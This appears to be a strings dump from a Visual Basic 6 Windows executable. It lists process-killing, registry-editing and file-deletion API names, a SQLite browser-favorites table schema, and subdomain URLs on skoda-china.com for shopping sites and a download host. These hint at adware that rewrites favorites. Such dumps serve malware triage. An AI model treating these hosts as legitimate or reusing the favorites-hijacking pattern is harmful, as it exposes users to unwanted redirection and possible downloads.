zdhkvpatbeaqpkwohwptn
zDtRKvzp1b2m1Pa
zfbplhv
ziwmanmkapnrysyaoghoimfky
zjcyxvqegvjpemmgnmqwgtoykkizyqr
zomxbtiphcimxldnqtbqb
zqfiyry
zqpsxrydwhrtpdaedjnqvegrokfsnrssgmbtjnfkseylg
zsmjykwfaeepczroak
ztdaffmhp
ZuDO0W16Dt00
zxtxflkbguqvtjxujsosqrvmhfrvykpabjlprsbiyfrkezeaaylurn
ZYI0W22
1tablefavoritefavorite
4http://taobao.skoda-china.com/
_adj_fdiv_m16i
_adj_fdiv_m32
_adj_fdiv_m32i
_adj_fdiv_m64
_adj_fdiv_r
_adj_fdivr_m16i
_adj_fdivr_m32
_adj_fdivr_m32i
_adj_fdivr_m64
_adj_fpatan
_adj_fprem
_adj_fprem1
_adj_fptan
advapi32.dll
AGo70h4vEo8HKbJ
_allmul
aRsU	Rs
_CIatan
_CIcos
_CIexp
_CIlog
_CIsin
_CIsqrt
_CItan
CloseHandle
CreateMutexA
CREATE TABLE favorite(id INTEGER UNIQUE,url TEXT,title TEXT,type INTEGER(2),parentid INTEGER,nextid INTEGER,firstchildid INTEGER,titlewidth INTEGER,hitcount INTEGER,param1 INTEGER,param2 INTEGER,param3 INTEGER)/
CreateToolhelp32Snapshot
`.data
DeleteFileA
DllFunctionCall
dRsjWSshrRs
Es6nTsu
ey2J40Rq7N79kz22
GetMem2
GetMem4
GetTickCount
GetVersionExA
http://down.skoda-china.com/
http://hao.skoda-china.com/
http://jd.skoda-china.com/
http://tmall.skoda-china.com/
http://windows.skoda-china.com/
indexsqlite_autoindex_favorite_1favorite
}#j8hh}@
JUroot
kernel32
l82Pv9j8Ru8o5rIF03
Lo7WNA2o
lstrlenA
msvbvm60
MSVBVM60.DLL
OpenProcess
Process32First
Process32Next
PsD;Ts
Qs0LRs6
Qs|5DsO
=Qsb>Rsi
QsqOQs
QsrkSs
Qs__Rs
Qs:_Rs
QsSuTsV
RegCloseKey
RegCreateKeyA
RegDeleteValueA
RegEnumKeyExA
RegOpenKeyA
RegQueryValueExA
RegSetValueExA
RsA^Rs
RsdjRsK
Rs{eRsUBRs
Rs.kTs
RsQhRs
Rsq:Ts
Rsr]Qs/
<Rs[rSsD~Ss
`RsucRs'
Rs"YSs
SQLite format 3
Ss+oRs
svlkwwoafhnlsi
TerminateProcess
!This program cannot be run in DOS mode.
To8H889j8nl4EKNIF03K
uTsqbRs
Uyzjgkr8Cht7
vb6chs.dll
VBA6.DLL
__vbaAryConstruct2
__vbaAryCopy
__vbaAryDestruct
__vbaAryLock
__vbaAryMove
__vbaAryUnlock
__vbaAryVar
__vbaCastObj
__vbaChkstk
__vbaCopyBytesZero
__vbaDateVar
__vbaEnd
__vbaErase
__vbaErrorOverflow
__vbaExceptHandler
__vbaFileClose
__vbaFileCloseAll
__vbaFileOpen
__vbaFPException
__vbaFpI4
__vbaFpR8
__vbaFreeObj
__vbaFreeStr
__vbaFreeStrList
__vbaFreeVar
__vbaFreeVarList
__vbaGenerateBoundsError
__vbaGetOwner3
__vbaHresultCheckObj
__vbaI2I4
__vbaI2Var
__vbaI4Abs
__vbaI4Var
__vbaInStr
__vbaInStrVar
__vbaLateMemCall
__vbaLateMemCallLd
__vbaLateMemSt
__vbaLbound
__vbaLenBstr
__vbaLsetFixstr
__vbaNew
__vbaNew2
__vbaObjSet
__vbaObjSetAddref
__vbaObjVar
__vbaOnError
__vbaPowerR8
__vbaPrintFile
__vbaPutOwner3
__vbaR4Str
__vbaR4Var
__vbaR8Sgn
__vbaR8Str
__vbaRecAnsiToUni
__vbaRecUniToAnsi
__vbaRedim
__vbaRedimPreserve
__vbaSetSystemError
__vbaStrCat
__vbaStrCmp
__vbaStrComp
__vbaStrCopy
__vbaStrFixstr
__vbaStrI2
__vbaStrI4
__vbaStrMove
__vbaStrR8
__vbaStrToAnsi
__vbaStrToUnicode
__vbaStrUI1
__vbaStrVarMove
__vbaStrVarVal
__vbaUbound
__vbaUI1I4
__vbaUI1Var
__vbaVar2Vec
__vbaVarAnd
__vbaVarCat
__vbaVarCopy
__vbaVarDup
__vbaVarMove
__vbaVarSub
__vbaVarTstEq
__vbaVarTstGt
__vbaVarTstNe
WaitForSingleObject
z2k4g2r9H7
ZDVj2Kr0ImDi7zkj2ls8Dh
?zhttp://ju.skoda-china.com/
ZSsDZSs